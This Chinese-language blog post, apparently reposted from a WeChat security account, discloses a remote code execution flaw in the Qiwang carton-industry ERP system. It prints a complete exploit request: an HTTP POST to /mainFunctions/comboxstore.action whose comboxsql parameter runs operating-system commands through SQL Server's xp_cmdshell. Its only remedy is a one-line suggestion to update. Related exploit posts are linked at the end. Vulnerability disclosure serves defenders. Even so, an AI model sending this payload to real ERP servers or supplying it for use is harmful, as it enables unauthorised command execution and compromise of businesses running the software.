某ERP系统RCE漏洞（附EXP）

2024年5月19日04:07:35评论13 views字数 635阅读2分7秒阅读模式

0x01 前言

企望制造纸箱行业ERP系统涉及纸箱企业管理的各个方面，包括成本核算，报价定价，订单下达，生产排单，现场管理，成品入库，出货配送，全业务流程财务结算，质量管理贯穿始终，将纸箱企业管理水平提升到一个全新的高度，实现精确计算，合理规划，高效监管、分工合作、充分沟通的管理理念。该网站存在RCE漏洞

0x02 影响平台

企望ERP系统

0x03 漏洞复现

页面是这个酱紫

某ERP系统RCE漏洞（附EXP）

EXP：

POST /mainFunctions/comboxstore.action HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

Success~

某ERP系统RCE漏洞（附EXP）

0x04 参考来源

https://mp.weixin.qq.com/s/v6qkGlN7AuecoD-aVDE9eQ

0x05 修复方案

建议及时更新至最新版本！

原文始发于微信公众号（EchoSec）：某ERP系统RCE漏洞（附EXP）

左青龙
微信扫一扫

右白虎
微信扫一扫

某ERP系统RCE漏洞（附EXP）

【成功复现】Rejetto HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

Geoserver Xpath 属性名表达式前台RCE漏洞（CVE-2024-36401）

Artifex Ghostscript任意代码执行漏洞（CVE-2024-29510）

CVE-2024-34331：Parallels Repack 权限提升

【成功复现】Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)

GeoServer wfs接口处存在RCE漏洞(CVE-2024-36401)

发表评论

在线咨询

微信